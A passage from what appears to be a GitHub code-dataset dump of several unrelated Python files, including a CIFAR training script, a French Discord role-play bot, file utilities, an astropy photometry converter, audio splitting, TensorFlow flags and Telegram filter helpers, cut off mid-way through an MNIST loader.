duration=time.time()-start\r\n # print('test time is :',duration)\r\n\r\n acc = (correct_cnt * 1.0 / float(total_cnt))\r\n print(\"acc:\", acc)\r\n return acc\r\n\r\ndef load_model(args):\r\n if args.data == 'cifar10':\r\n # net=VGG('VGG16')\r\n # net = ResNeXt29_2x64d()\r\n # net = 
MobileNet()\r\n # net = MobileNetV2(num_classes=10,scale=1.6)\r\n # net=ResNet50(num_classes=100)\r\n # net = DPN92()\r\n # net = ShuffleNetG2(num_classes=10)\r\n # net = SENet18()\r\n # net=ResNet101(num_classes=10)\r\n # net = NewModel24(num_classes=10)\r\n # net=ResNeXt29_2x64d()\r\n # net=inverse(num_classes=10,input_size=args.input_size)\r\n # net=pre_t(num_classes=10,input_size=args.input_size)\r\n net=pre_inverse(num_classes=10,input_size=args.input_size)\r\n # net=PreActResNet34()\r\n # net=DenseNet121(num_classes=10)\r\n elif args.data == 'cifar100':\r\n # net = VGG('VGG16')\r\n # net = ResNeXt29_2x64d()\r\n net = MobileNet(num_classes=100)\r\n # net = MobileNetV2(num_classes=100,scale=1.0)\r\n # net=SENet18(num_classes=100)\r\n # net=Inverse_M(num_classes=100,scale=1.0)\r\n # net = DPN92()\r\n # net = ShuffleNetG2(num_classes=100)\r\n # net = SENet18()\r\n # net=inverse(num_classes=100,input_size=args.input_size)\r\n # net = pre_t(num_classes=100, input_size=args.input_size)\r\n # net = pre_inverse(num_classes=100,input_size=args.input_size)\r\n # net = ResNet34(num_classes=100)\r\n # net = NewModel24(num_classes=100)\r\n # net = DenseNet121(num_classes=100)\r\n # net=SINet(num_classes=100,add=False)\r\n return net\r\n\r\nif __name__ == '__main__':\r\n summary_dir = './result/log/' + args.save + '/'\r\n if not os.path.exists(summary_dir):\r\n os.makedirs(summary_dir)\r\n\r\n print('log dir: ' + summary_dir)\r\n writer = SummaryWriter(log_dir=summary_dir)\r\n\r\n # Model\r\n save_path_root=\"/home/yaoyang/result/\"\r\n # log_sum_dir=save_path_root+args.save_training_log+'.json'\r\n use_cuda = torch.cuda.is_available()\r\n\r\n model_path=save_path_root+args.save\r\n\r\n print('model_save_path is:',model_path)\r\n\r\n # net=load_model(args)\r\n net=M2(1.0,32,6,3,100)\r\n if args.gpus is not None:\r\n args.gpus = [int(i) for i in args.gpus.split(',')]\r\n cudnn.benchmark = True\r\n\r\n\r\n if args.resume:\r\n print('==> loading model..')\r\n # net = torch.nn.DataParallel(net, device_ids=range(torch.cuda.device_count()))\r\n net = torch.nn.DataParallel(net, device_ids=args.gpus)\r\n net,best_acc,curEpoch=loadModel(model_path,net)\r\n else:\r\n best_acc=0\r\n curEpoch=0\r\n print('==> Building model..')\r\n # net = torch.nn.DataParallel(net, device_ids=range(torch.cuda.device_count()))\r\n net = torch.nn.DataParallel(net, device_ids=args.gpus)\r\n\r\n print('current epoch: ', curEpoch)\r\n print('current best acc: ', best_acc)\r\n use_cuda=torch.cuda.is_available()\r\n train(net,epoch=200,checkPoint=10,savePoint=500,modelPath=model_path,\r\n useCuda=use_cuda,best_acc=best_acc,adjustLR=True,curEpoch=curEpoch,earlyStop=False)\r\n\r\n","repo_name":"source-code-share/SINet","sub_path":"codes/cifar_train.py","file_name":"cifar_train.py","file_ext":"py","file_size_in_byte":8249,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"23576742880","text":"import random\r\nimport re\r\n\r\nfrom discord.ext import commands\r\n\r\n\r\nbot = commands.Bot(command_prefix='/')\r\n\r\n\r\n@bot.command(description=\"Dis coucou au gentil robot!\",\r\n brief=\"Politesse avant tout!\",\r\n pass_context=True)\r\nasync def hello(context):\r\n possible_responses = [\r\n \"おはよう\",\r\n \"Hello\",\r\n \"Non. 
\",\r\n ]\r\n await bot.say(random.choice(possible_responses) + context.message.author.mention)\r\n\r\n\r\n@bot.command(description=\"Je te le dis, tu vas le regretter, ne fais pas ça.\",\r\n brief=\"Ne fais pas ça.\")\r\nasync def non():\r\n videos_infernales = [\r\n \"https://www.youtube.com/watch?v=juqyzgnbspY\",\r\n \"https://www.youtube.com/watch?v=InQC3MvDZM4\",\r\n ]\r\n await bot.say(\"Tu l'auras voulu :) \" + random.choice(videos_infernales))\r\n\r\n\r\n# Descriptions des admins\r\n\r\n@bot.command(name=\"Silonix\",\r\n description=\"Permet d'obtenir des informations sur notre très cher Silonix.\",\r\n brief=\"Détails sur Silonix\")\r\nasync def silonix():\r\n await bot.say(\"Fondateur de Elydra et ancien administrateur de Malm, Silonix est un loriste investi, \"\r\n \"un MJ démoniaque, mais aussi une personne fort sympathique, malgré les airs un peu hautains \"\r\n \"qu'il se donne par moments. Il est responsable des Wizel, et adore les anguilles. :)\")\r\n\r\n\r\n@bot.command(name=\"Styx\",\r\n description=\"Permet d'obtendir des informations sur notre très cher Styx.\",\r\n brief=\"Détails sur Styx\")\r\nasync def styx():\r\n await bot.say(\"Fondateur de Elydra et ancien fondateur de Malm, Styx est un loriste sérieux, un MJ assidu, \"\r\n \"mais aussi une personne fort sympathique, malgré les airs un peu froids et distants qu'il se \"\r\n \"donne par moments. Il est responsable des Widriens, et adore les cailloux. :)\")\r\n\r\n\r\n@bot.command(name=\"Luxia\",\r\n description=\"Permet d'obtenir des informations sur notre très chère Luxia.\",\r\n brief=\"Détails sur Luxia\")\r\nasync def luxia():\r\n await bot.say(\"Fondatrice de Elydra et ancienne fondatrice de Malm, Luxia est une loriste désastreuse, une MJ \"\r\n \"catastrophique, mais aussi une personne fort sympathique [parfois], malgré les airs un peu \"\r\n \"excentriques [de psychopathe] qu'elle se donne par moments. Elle n'est responsable de rien\"\r\n \" [trop dangereux], mais surveille le règlement, ce bot et les parties de Cards Against \"\r\n \"Humanity. Elle sert aussi de psychologue à ses heures perdues, et adore les pots de fleurs \"\r\n \"et les tomates. 
Personne n'est certain qu'elle soit réellement de sexe féminin.\")\r\n\r\n\r\n# commandes citation règlement\r\n\r\n\r\n@bot.command(name=\"règle1\",\r\n description=\"Cite la règle 1\",\r\n brief=\"Cite la règle 1\")\r\nasync def rule1():\r\n await bot.say(\"**Tous propos insultants, rabaissants, diffamatoires, racistes, homophobes, discriminants à \"\r\n \"l’encontre de qui que ce soit sont formellement interdits.** Même à titre humoristiques.\")\r\n\r\n\r\n@bot.command(name=\"règle2\",\r\n description=\"Cite la règle 2\",\r\n brief=\"Cite la règle 2\")\r\nasync def rule2():\r\n await bot.say(\"**Le spam, le contenu à caractère pornographique ou NSFW, ainsi que les publicités pour d’autres\"\r\n \" serveurs sont prohibés.** Vous n’aurez qu’à faire tout ce qui concerne ce qui vient d’être \"\r\n \"énoncé en privé.\")\r\n\r\n\r\n@bot.command(name=\"règle3\",\r\n description=\"Cite la règle 3\",\r\n brief=\"Cite la règle 3\")\r\nasync def rule3():\r\n await bot.say(\"**Les personnages de RP doivent être équilibrés, mortels, pas intouchables, respecter les meurs \"\r\n \"et les règles des clans auxquels ils appartiennent.** Pour que le jeu soit agréable pour chacun, \"\r\n \"chaque personnage doit rester dans un champ “possible” et raisonnable par rapport au lore.\")\r\n\r\n\r\n@bot.command(name=\"règle4\",\r\n description=\"Cite la règle 4\",\r\n brief=\"Cite la règle 4\")\r\nasync def rule4():\r\n await bot.say(\"**En rp, les actions d’un personnage doivent être logiques, plausibles et cohérentes avec l’\"\r\n \"univers.** De sorte à garder une ambiance agréable pour ceux qui jouent avec vous. **En cas de \"\r\n \"besoin, n’hésitez pas à utiliser les dés pour déterminer l’issue d’une action résultant de la \"\r\n \"chance.**\")\r\n\r\n\r\n@bot.command(name=\"règle5\",\r\n description=\"Cite la règle 5\",\r\n brief=\"Cite la règle 5\")\r\nasync def rule5():\r\n await bot.say(\"**En rp, il est interdit de jouer le personnage d’un autre à sa place** (à moins que celui-ci en \"\r\n \"ait donné l’autorisation). Vous ne faites agir que votre propre personnage.\")\r\n\r\n\r\n@bot.command(name=\"règle6\",\r\n description=\"Cite la règle 6\",\r\n brief=\"Cite la règle 6\")\r\nasync def rule6():\r\n await bot.say(\"**Votre pseudo devra être le prénom accompagné, si vous le désirez, du nom de votre personnage.**\"\r\n \" Pour rappel, vous pouvez changer votre surnom sur ce serveur en appuyant sur le bouton “Eydra” \"\r\n \"puis “Changer de pseudo”. De plus, **il est obligatoire de remplir sa fiche entièrement selon le \"\r\n \"modèle épinglé dans #présentations pour pouvoir être validé.**\")\r\n\r\n\r\n@bot.command(name=\"règle7\",\r\n description=\"Cite la règle 7\",\r\n brief=\"Cite la règle 7\")\r\nasync def rule7():\r\n await bot.say(\"**Il est interdit de tuer le personnage de quelqu’un d’autre.** Cependant, il est quand même \"\r\n \"possible de mourir, durant des évent ou encore si vous repoussez trop les limites de votre \"\r\n \"personnage, suite à une décision du staff, accompagnée de l’action de MJs.\")\r\n\r\n\r\n@bot.command(name=\"règle8\",\r\n description=\"Cite la règle 8\",\r\n brief=\"Cite la règle 8\")\r\nasync def rule8():\r\n await bot.say(\"**Les messages HRP entre parenthèses sont autorisés dans le RP** mais doivent rester \"\r\n \"exceptionnels et être supprimés après coup. 
De plus, **il est interdit d’utiliser un langage \"\r\n \"abrégé ou des smileys dans le rp.** Essayez de conserver une orthographe correcte, et démarquez \"\r\n \"les paroles des actions de votre personnage en mettant par exemple les paroles entre guillemets, \"\r\n \"et le reste en Italique. (Rappel, vous pouvez mettre un texte en Italique en mettant des étoiles \"\r\n \"ou des underscores au début et à la fin de votre texte, ``*comme ceci*`` ou ``_comme cela_``.)\")\r\n\r\n\r\n@bot.command(name=\"règle9\",\r\n description=\"Cite la règle 9\",\r\n brief=\"Cite la règle 9\")\r\nasync def rule9():\r\n await bot.say(\"Enfin, **vous êtes autorisés à avoir autant de comptes que vous le souhaitez**, pour autant que \"\r\n \"vous fassiez de votre mieux pour les garder actifs un minimum. Refondre ses personnages est aussi\"\r\n \" possible sans conditions.\")\r\n\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print('Logged in as')\r\n print(bot.user.name)\r\n print(bot.user.id)\r\n print('------')\r\n\r\n\r\n@bot.event\r\nasync def on_command_error(error, ctx):\r\n if isinstance(error, commands.MissingRequiredArgument):\r\n await bot.send_message(ctx.message.channel, \"Utilisation: `.r #d#` e.g. `.r 1d20`\\nUtilise .help pour plus \"\r\n \"d'informations.\")\r\n\r\n\r\n@bot.command(pass_context=True)\r\nasync def r(ctx, roll: str):\r\n \"\"\"Lance un dé utilisant le format #d# .\r\n e.g .r 3d6\"\"\"\r\n\r\n resultTotal = 0\r\n resultString = ''\r\n try:\r\n try:\r\n numDice = roll.split('d')[0]\r\n diceVal = roll.split('d')[1]\r\n except Exception as e:\r\n print(e)\r\n await bot.say(\"La commande doit être au format #d# %s.\" % ctx.message.author.name)\r\n return\r\n\r\n if int(numDice) > 500:\r\n await bot.say(\"Je ne peux pas lancer autant de dés %s.\" % ctx.message.author.name)\r\n return\r\n\r\n bot.type()\r\n await bot.say(\"En train de rouler %s d%s pour %s\" % (numDice, diceVal, ctx.message.author.mention))\r\n rolls, limit = map(int, roll.split('d'))\r\n\r\n for r in range(rolls):\r\n number = random.randint(1, limit)\r\n resultTotal = resultTotal + number\r\n\r\n if resultString == '':\r\n resultString += str(number)\r\n else:\r\n resultString += ', ' + str(number)\r\n\r\n if numDice == '1':\r\n await bot.say(\"Dé de \" + ctx.message.author.mention + \" :game_die:\\n**Résultat:** \" + resultString)\r\n else:\r\n await bot.say(\r\n \"Dé de \" + ctx.message.author.mention + \" :game_die:\\n**Résultat:** \" + resultString +\r\n \"\\n**Total:** \" + str(resultTotal))\r\n\r\n except Exception as e:\r\n print(e)\r\n return\r\n\r\n\r\n@bot.command(pass_context=True)\r\nasync def rt(ctx, roll: str):\r\n \"\"\"Lance un dé utilisant le format #d#s# avec un comparateur de réussite, où s est le comparateur de type (< = >).\r\n e.g .r 3d10<55\"\"\"\r\n\r\n numberSuccesses = 0\r\n resultString = ''\r\n\r\n try:\r\n valueList = re.split(\"(\\d+)\", roll)\r\n valueList = list(filter(None, valueList))\r\n\r\n diceCount = int(valueList[0])\r\n diceValue = int(valueList[2])\r\n thresholdSign = valueList[3]\r\n successThreshold = int(valueList[4])\r\n\r\n except Exception as e:\r\n print(e)\r\n await bot.say(\"La commande doit être au format #d#t# %s.\" % ctx.message.author.mention)\r\n return\r\n\r\n if int(diceCount) > 500:\r\n await bot.say(\"Je ne peux pas lancer autant de dés %s.\" % ctx.message.author.mention)\r\n return\r\n\r\n bot.type()\r\n await bot.say(\"En train de rouler %s d%s pour %s avec une réussite %s %s\" % (\r\n diceCount, diceValue, ctx.message.author.name, thresholdSign, 
successThreshold))\r\n\r\n try:\r\n for r in range(0, diceCount):\r\n\r\n number = random.randint(1, diceValue)\r\n isRollSuccess = False\r\n\r\n if thresholdSign == '<':\r\n if number < successThreshold:\r\n numberSuccesses += 1\r\n isRollSuccess = True\r\n\r\n elif thresholdSign == '=':\r\n if number == successThreshold:\r\n numberSuccesses += 1\r\n isRollSuccess = True\r\n\r\n else: # >\r\n if number > successThreshold:\r\n numberSuccesses += 1\r\n isRollSuccess = True\r\n\r\n if resultString == '':\r\n if isRollSuccess:\r\n resultString += '**' + str(number) + '**'\r\n else:\r\n resultString += str(number)\r\n else:\r\n if isRollSuccess:\r\n resultString += ', ' + '**' + str(number) + '**'\r\n else:\r\n resultString += ', ' + str(number)\r\n\r\n isRollSuccess = False\r\n\r\n if diceCount == 1:\r\n if numberSuccesses == 0:\r\n await bot.say(\r\n \"Dé de \" + ctx.message.author.mention + \" :game_die:\\n**Résultat:** \" + resultString +\r\n \"\\n**Réussite:** :x:\")\r\n else:\r\n await bot.say(\r\n \"Dé de \" + ctx.message.author.mention + \" :game_die:\\n**Résultat:** \" + resultString +\r\n \"\\n**Réussite:** :white_check_mark:\")\r\n else:\r\n await bot.say(\r\n \"Dé de \" + ctx.message.author.mention + \" :game_die:\\n**Résultat:** \" + resultString +\r\n \"\\n**Réussite:** \" + str(numberSuccesses))\r\n except Exception as e:\r\n print(e)\r\n return\r\n\r\n\r\nbot.run(token)\r\n","repo_name":"LuxiaFlowerpot/thishasnointerest","sub_path":"Anguille-test.py","file_name":"Anguille-test.py","file_ext":"py","file_size_in_byte":12332,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14849853036","text":"import errno\nimport os\nfrom os import path, listdir\nfrom os.path import isfile, join, isdir\nimport subprocess as sp\n\ntry:\n from subprocess import DEVNULL \nexcept ImportError:\n DEVNULL = open(os.devnull, 'w')\n\n\n#create as many subdirectories that don't already exists\ndef mkdir_p(new_path):\n try:\n os.makedirs(new_path)\n except OSError as exc: \n if exc.errno == errno.EEXIST and path.isdir(new_path):\n pass\n else:\n raise\n\n#for file in get_files_of_type(root_dir, extention): ...\ndef get_files_of_type(root_dir, extention):\n for root, dirs, files in os.walk(root_dir):\n for f in files:\n if f.endswith(extention):\n yield os.path.join(root, f)\n\ndef getDirsIn(dirName, joinDir=True):\n try:\n onlyDirs = [d for d in listdir(dirName) if isdir(join(dirName, d))]\n if joinDir:\n return [join(dirName, d) for d in onlyDirs]\n else:\n return onlyDirs\n except BaseException:\n raise\n\ndef write_lines(lines, file_name):\n with open(file_name, 'w') as out_file:\n text = '\\n'.join(lines)\n out_file.write(text)\n\ndef format_json(json_path):\n with open(json_path) as data:\n d = json.load(data)\n json_f = open(json_path, 'w')\n json.dump(d, json_f, indent = 4, sort_keys = True)\n\ndef copy(src, dst):\n if not path.exists(dst):\n mkdir_p(dst)\n\n cp_cmd = \"cp {} {}\".format(src, dst)\n run_p(cp_cmd)\n\ndef run_p(command):\n command_list = command.split()\n try:\n p = sp.Popen(command_list, stderr = DEVNULL, stdout = DEVNULL, stdin = DEVNULL)\n out, err = p.communicate()\n if err:\n print(err)\n finally:\n if p:\n p.kill()\n\ndef get_imediate_dir(file_path):\n return 
path.basename(path.normpath(file_path))\n","repo_name":"mlanden/Useful-Code-Snippits","sub_path":"utilities/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24803778310","text":"from astropy.time import Time\nfrom astropy.table import Table\nfrom astropy.io import ascii\n\n\ndef skyportal_input_to_nmma(data_dict):\n\n # this example analysis service expects the photometry to be in\n # a csv file (at data_dict[\"inputs\"][\"photometry\"]) with the following columns\n # - filter: the name of the bandpass\n # - mjd: the modified Julian date of the observation\n # - magsys: the mag system (e.g. ab) of the observations\n # - limiting_mag:\n # - magerr:\n # - flux: the flux of the observation\n # the following code transforms these inputs from SkyPortal\n # to the format expected by nmma.\n # And makes sure thate the times is in correct format\n # We need to convert the time format mjd to the format expected by of session so in jd\n # the utils.py file need jd format which will be convert in isot.\n\n rez = {\"status\": \"failure\", \"message\": \"\", \"analysis\": {}}\n\n try:\n\n data = Table.read(data_dict, format=\"ascii.csv\")\n\n # convert time in julien day format (jd)\n # check if time is really in mjd format\n # if data[\"mjd\"] is in mjd, time < 0\n\n for time_format in [\"mjd\", \"jd\"]:\n if (time_format == \"mjd\") & (time_format in data.columns):\n try:\n time = Time(data[\"mjd\"][0], format=\"jd\").mjd\n\n except KeyError:\n print(f\" Sorry the name: {time_format} does not exits\")\n\n else:\n if time < 0:\n data[\"mjd\"] = Time(data[\"mjd\"], format=\"mjd\").jd\n\n data.rename_column(\"mjd\", \"jd\")\n\n # check if the time is in jd format\n # if data[\"jd\"] is in jd, time < 0\n elif (time_format == \"jd\") & (time_format in data.columns):\n try:\n time = Time(data[\"jd\"][0], format=\"jd\").mjd\n except KeyError:\n print(f\" Sorry the name: {time_format} does not exits\")\n\n else:\n if time < 0:\n data[\"jd\"] = Time(data[\"jd\"], format=\"mjd\").jd\n\n # Rename Columns from skyportal to nmma format\n # skyportal_col = [\"magerr\", \"limiting_mag\", \"instrument_name\"]\n\n for col in data.columns:\n if col == \"magerr\":\n data.rename_column(\"magerr\", \"mag_unc\")\n\n elif col == \"limmiting_mag\":\n data.rename_column(\"limiting_mag\", \"limmag\")\n\n elif col == \"instrument_name\":\n data.rename_column(\"instrument_name\", \"programid\")\n\n switcher = {1: \"ztfg\", 2: \"ztfr\", 3: \"ztfi\"}\n\n for filt in switcher.values():\n index = np.where(data[\"filter\"] == filt)\n\n if filt == \"ztfg\":\n data[\"filter\"][index] = \"g\"\n elif filt == \"ztfr\":\n data[\"filter\"][index] = \"r\"\n elif filt == \"ztfi\":\n data[\"filter\"][index] = \"i\"\n else:\n data[\"filter\"][index] = filt\n\n data = data.filled()\n data.sort(\"jd\")\n\n if \"obj_id\" in data.columns:\n cand_name = data[\"obj_id\"]\n\n else:\n cand_name = \"ztf_filename\"\n\n data = data.filled()\n data.sort(\"jd\")\n\n except Exception as e:\n rez.update(\n {\n \"status\": \"failure\",\n \"message\": f\"input data is not in the expected format {e}\",\n }\n )\n return rez\n\n return data\n","repo_name":"weizmannk/nmma-skyportal","sub_path":"utils/nmma_process.py","file_name":"nmma_process.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9420962136","text":"# 
coding=utf-8\nfrom django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n # Toutes les urls en app/ gérées par l'application elle même\n url(r'^app/', include('app.urls', namespace=\"app\")),\n)\n","repo_name":"MilkShakeTeam/Frigo","sub_path":"project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40292219965","text":"import librosa as li\nimport os\nimport soundfile as sf\nimport numpy as np\n\nfolders = os.listdir(\"./samples\")\n\nt = 8\n\nfor folder in folders:\n files = os.listdir(\"./samples/\" + folder)\n j = 0\n for file in files:\n print(file)\n audio, sr = li.load(os.path.join(\"./samples/\" + folder, file),\n sr=44100)\n\n nb_samples = t * sr\n split = len(audio) // nb_samples + 1\n\n audios = np.array_split(audio, split)\n\n for audio in audios:\n sf.write(os.path.join(\"./samples/\" + folder,\n str(j) + \".wav\"),\n audio,\n samplerate=44100)\n j += 1\n","repo_name":"dgenova/RAVEberry-server","sub_path":"audio_crop.py","file_name":"audio_crop.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"22573388957","text":"from __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport time\nimport tensorflow as tf\nimport numpy as np\nimport sklearn\nfrom sklearn import metrics\nfrom Hypothesis_train import Hypo_Gen\ntf.compat.v1.disable_eager_execution()\n\n# os.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\n\n# Set random seed\nseed = 123\nnp.random.seed(seed)\ntf.compat.v1.set_random_seed(seed)\n\n# Settings\nflags = tf.compat.v1.app.flags\nFLAGS = flags.FLAGS\ntf.compat.v1.app.flags.DEFINE_boolean('log_device_placement', False,\n\t\t\t\t\t\t\t\"\"\"Whether to log device placement.\"\"\")\n#core params..\nflags.DEFINE_string('model', 'graphsage_mean', 'model names. See README for possible values.') \nflags.DEFINE_float('learning_rate', 0.0005, 'initial learning rate.')\nflags.DEFINE_string(\"model_size\", \"small\", \"Can be big or small; model specific def'ns\")\nflags.DEFINE_string(\"key_type\", \"all_keys\", \"dataset category to use\")\nflags.DEFINE_string(\"data_folder\", \"corona_data\", \"dataset to use\")\nflags.DEFINE_string(\"test_type\",\"full\", \"method for evaluation [full,eval]\")\nflags.DEFINE_string(\"risk_type\", \"upu\", \"risk to use\")\n\n# left to default values in main experiments \nflags.DEFINE_integer('epochs', 3, 'number of epochs to train.')\nflags.DEFINE_float('dropout', 0.0,'dropout rate (1 - keep probability).')\nflags.DEFINE_float('weight_decay', 0.0, 'weight for l2 loss on embedding matrix.')\nflags.DEFINE_integer('max_degree', 128, 'maximum node degree.')\nflags.DEFINE_integer('samples_1', 20, 'number of samples in layer 1')\nflags.DEFINE_integer('samples_2', 10, 'number of samples in layer 2')\nflags.DEFINE_integer('samples_3', 0,'number of users samples in layer 3. 
(Only for mean model)')\nflags.DEFINE_integer('dim_1', 128, 'Size of output dim (final is 2x this, if using concat)')\nflags.DEFINE_integer('dim_2', 128, 'Size of output dim (final is 2x this, if using concat)')\nflags.DEFINE_boolean('random_context', True, 'Whether to use random context or direct edges')\nflags.DEFINE_integer('batch_size', 512, 'minibatch size.')\nflags.DEFINE_boolean('sigmoid', True, 'whether to use sigmoid loss')\nflags.DEFINE_integer('identity_dim', 0, 'Set to positive value to use identity embedding features of that dimension. Default 0.')\n\n#logging, saving, validation settings etc.\nflags.DEFINE_string('base_log_dir', '.', 'base directory for logging and saving embeddings')\nflags.DEFINE_integer('validate_iter', 5000, \"how often to run a validation minibatch.\")\nflags.DEFINE_integer('validate_batch_size', 256, \"how many nodes per validation sample.\")\n# flags.DEFINE_integer('gpu', 1, \"which gpu to use.\")\nflags.DEFINE_integer('print_every', 40, \"How often to print training info.\")\nflags.DEFINE_integer('max_total_steps', 10**10, \"Maximum total number of iterations\")\n\n# os.environ[\"CUDA_VISIBLE_DEVICES\"]=str(FLAGS.gpu)\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n\n\n\n\n\n\ndef main(argv=None):\n\tacc, f1, rec, conf_mat = 0, 0, 0, np.array([[0,1],[0,0]])\n\tcurrent_year = 1959\n\tverbose = True\n\ttf.compat.v1.reset_default_graph()\n\thpg = Hypo_Gen(current_year, verbose)\n\thpg.train_test(FLAGS, verbose)\n\nif __name__ == '__main__':\n\t# app.run() parses flags and then calls main() itself\n\ttf.compat.v1.app.run()\n\n\n\n\n\n\n","repo_name":"Uchman21/TRP","sub_path":"supervised_train.py","file_name":"supervised_train.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"33650991946","text":"import itertools\nN = int(input())\narr = [list(map(int,input().split())) for _ in range(N)]\nnum = [i for i in range(N)]\npublic = list(itertools.combinations(num,(N//2)))\nlength = len(public)\nminimum = 1000000\nfor k in range(length//2) :\n    num1=num2=0\n    public2 = itertools.permutations(public[k],2)\n    public3 = itertools.permutations(public[length-k-1],2)\n    for j in public2 :\n        num1 += arr[j[0]][j[1]]\n\n    for t in public3 :\n        num2 += arr[t[0]][t[1]]\n\n    minimum = min(minimum,abs(num1-num2))\n\nprint(minimum)","repo_name":"joun008/20185182_BAEKJOON","sub_path":"src/sw_1_6/Q.06.py","file_name":"Q.06.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29127038795","text":"class Fib_eternal:\n    \"\"\"По объектам этого класса можно итерироваться и получать 6 чисел Фибоначчи\"\"\"\n\n    class _Fib_eternal_iter:\n        \"\"\"Внутренний класс — итератор\"\"\"\n        def __init__(self):\n            self.i = 0\n            self.fib1 = 1\n            self.fib2 = 1\n\n        def __next__(self):\n            if self.i < 2:\n                self.i += 1\n                return self.fib1\n\n            self.i += 1\n            fib3 = self.fib1 + self.fib2\n            self.fib1 = self.fib2\n            self.fib2 = fib3\n            return fib3\n\n    def __iter__(self):\n        \"\"\"Создать и вернуть итератор\"\"\"\n        return Fib_eternal._Fib_eternal_iter()\n\n\nf6 = Fib_eternal()\n\nfor f in f6:\n    print(f)\n","repo_name":"TheSimBiONe/SPBAU_Best_python_course","sub_path":"Eternal_Fib.py","file_name":"Eternal_Fib.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"45334401776","text":"import sys\nsys.path.append('../api')\n\nsys.path.append('../conn')\nimport 
filters\nimport mysql5\n\n\ncompetenze = \"\"\n\n\n\ndef get_competences():\n    '''Returns all the competences from db'''\n    docList = mysql5.getCompetences()\n    competenze1 = \"\"\n    competenze2 = \"\"\n    docSize = 0\n    for i in docList:\n        docSize +=1 \n        id_c = int(i[0])\n\n        if id_c < 0:\n            id_c = str( \"_\" + str(id_c)[1:] )\n        else:\n            id_c = str(id_c)\n\n        competence = str(i[1])\n        \n        if docSize > 80:\n            competenze2 += competence + \" \" + \"/_id_c_\" + id_c + \"\\n\"\n        else:\n            competenze1 += competence + \" \" + \"/_id_c_\" + id_c + \"\\n\"\n\n    return competenze1, competenze2\n\n\ndef get_products():\n    docList = mysql5.getProducts()\n    products = \"\"\n    print(\"lista:\", docList)\n    for i in docList:\n        products += str(i[1]) + \" \" + \"/_id_p_\" + str(i[0]) + \"\\n\"\n    print(products)\n    return products\n\ndef get_areas():\n    area_list = mysql5.get_areas()\n    areas = \"\"\n    print(\"lista:\", area_list)\n    for i in area_list:\n        areas += \" \" + str(i[2]) + \" \"+ \"/_id_area_\" + str(i[0]) + \"\\n\"\n    print(areas)\n    return areas\n\ndef get_sub_areas(tid):\n\n    # fetch the area for the user tid\n    sub_areas = filters.get_area_from_tid(tid)\n    if len(sub_areas) < 1:\n        return \"Non esiste Area per la sottoarea selezionata. Inserire prima l'area\"\n\n    s_area_list = mysql5.get_sub_areas(sub_areas[0][0])\n    s_areas = \"\"\n    print(\"lista:\", s_area_list)\n    for i in s_area_list:\n        s_areas += \" \" + str(i[2]) + \" \"+ \"/_id_suba_\" + str(i[0]) + \"\\n\"\n    print(s_areas)\n    return s_areas\n\n\n\ndef decodeCompetence(cid,docList):\n    for i in docList:\n        if str(i['id']).strip() == cid:\n            return str(i['label']).strip()\n    return 0\n\n\n\ndef getMyFilters(tid):\n    mylist = filters.getFilters(tid)\n    listFilterAsString= \"\"\n    for i in mylist:\n        tipo = \"\"\n        if str(i[2]) == \"C\":\n            tipo = \"Competenza\"\n        elif str(i[2]) == 'P':\n            tipo = \"Prodotto\"\n        elif str(i[2]) == 'A':\n            tipo = \"Area\"\n        elif str(i[2]) == 'S':\n            tipo = \"Sottoarea\"\n        listFilterAsString += tipo + \": (\" + str(i[3]) + \") \" + mysql5.getProductOrCompetence(str(i[2]), str(i[3]))[0][0] + \"\\n\"\n    return listFilterAsString\n\n\ndef showFilterToBeDelete(tid):\n    mylist = filters.getFilters(tid)\n    listFilterAsString= \"\"\n    for i in mylist:\n        tipo = \"\"\n        if str(i[2]) == \"C\":\n            tipo = \"Competenza\"\n        elif str(i[2]) == 'P':\n            tipo = \"Prodotto\"\n        elif str(i[2]) == 'A':\n            tipo = \"Area\"\n        elif str(i[2]) == 'S':\n            tipo = \"Sottoarea\"\n        listFilterAsString += \"/\" + tipo + \"_id_cf_\" + str(i[0]) + \") \" + mysql5.getProductOrCompetence(str(i[2]), str(i[3]))[0][0] + \"\\n\"\n    return listFilterAsString\n\n\n\ndef deleteFilter(telid, fid):\n    if filters.deleteFilter(telid, fid):\n        return \"Filtro cancellato con successo\"\n    else:\n        return \"Non è stato possibile cancella il tuo filtro, riprova piu tardi!\"\n\n\n\n# print(getMyFilters(145645559))\n#print(deleteFilter(145645559))\n# get_competence()","repo_name":"TomasMali/Ticket","sub_path":"telepot/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4385462510","text":"import numpy as np\nimport cv2\nimport os\n\ndef load_data(trainingData, trainingLabel, testingData, testingLabel, dataset = \"MNIST\"):\n    trainingData = os.environ[dataset] + trainingData\n    trainingLabel = os.environ[dataset] + trainingLabel\n    testingData = os.environ[dataset] + testingData\n    testingLabel = os.environ[dataset] + testingLabel\n\n    X_train = 